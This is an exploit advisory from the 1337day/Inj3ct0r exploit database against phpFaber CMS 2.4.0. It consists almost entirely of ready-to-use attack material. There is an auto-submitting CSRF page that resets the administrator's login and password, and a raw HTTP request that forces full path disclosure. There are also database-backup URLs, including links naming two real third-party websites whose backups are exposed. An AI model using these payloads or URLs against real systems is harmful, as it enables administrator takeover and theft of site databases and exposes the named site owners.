phpFaber CMS Multiple Vulnerabilities

phpFaber CMS Multiple Vulnerabilities

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : 1337day.com                                   0 
1  [+] Support e-mail  : submit[at]1337day.com                         1 
0                                                                      0 
1               #########################################              1 
0               I'm DaOne member from Inj3ct0r Team                    1 
1               #########################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
########################################## 
# Exploit Title: phpFaber CMS Multiple Vulnerabilities 
# Date: 2012-10-24 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://www.phpfaber.com/files/phpfaber_cms_enc.zip 
# Category: webapps/php 
# Version: 2.4.0 
########################################## 
 
[#] CSRF Change Administrator Settings: 
<html> 
<body onload="document.form0.submit();"> 
<form method="POST" name="form0" action="http://[target]/cms_admin/index.php?page=adm"> 
<input type="hidden" name="name" value="admin2"> 
<input type="hidden" name="email" value="admin@email.tst"> 
<input type="hidden" name="login" value="adm"> 
<input type="hidden" name="pwd" value="passw0rd"> 
<input type="hidden" name="pwd2" value="passw0rd"> 
</form> 
</body> 
</html> 
 
 
[#] Database Disclosure: 
http://host/cms_content/backup/[year-month-day]db_name.zip 
# Example: 
http://www.afzarazma.com/fa/cms_content/backup/[10-06-08]afzarazm_fadb.zip 
http://www.wispkhan.com.au/cms_content/backup/[12-01-14]entire_site.zip 
 
 
[#] Full Path Disclosure: 
# PoC 
POST /cms_admin/index.php?page=login HTTP/1.1 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: ar,en-us;q=0.7,en;q=0.3 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 29 
 
login=adm&pwd[]=aaaaa&go=Login 
 
 
---- 
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir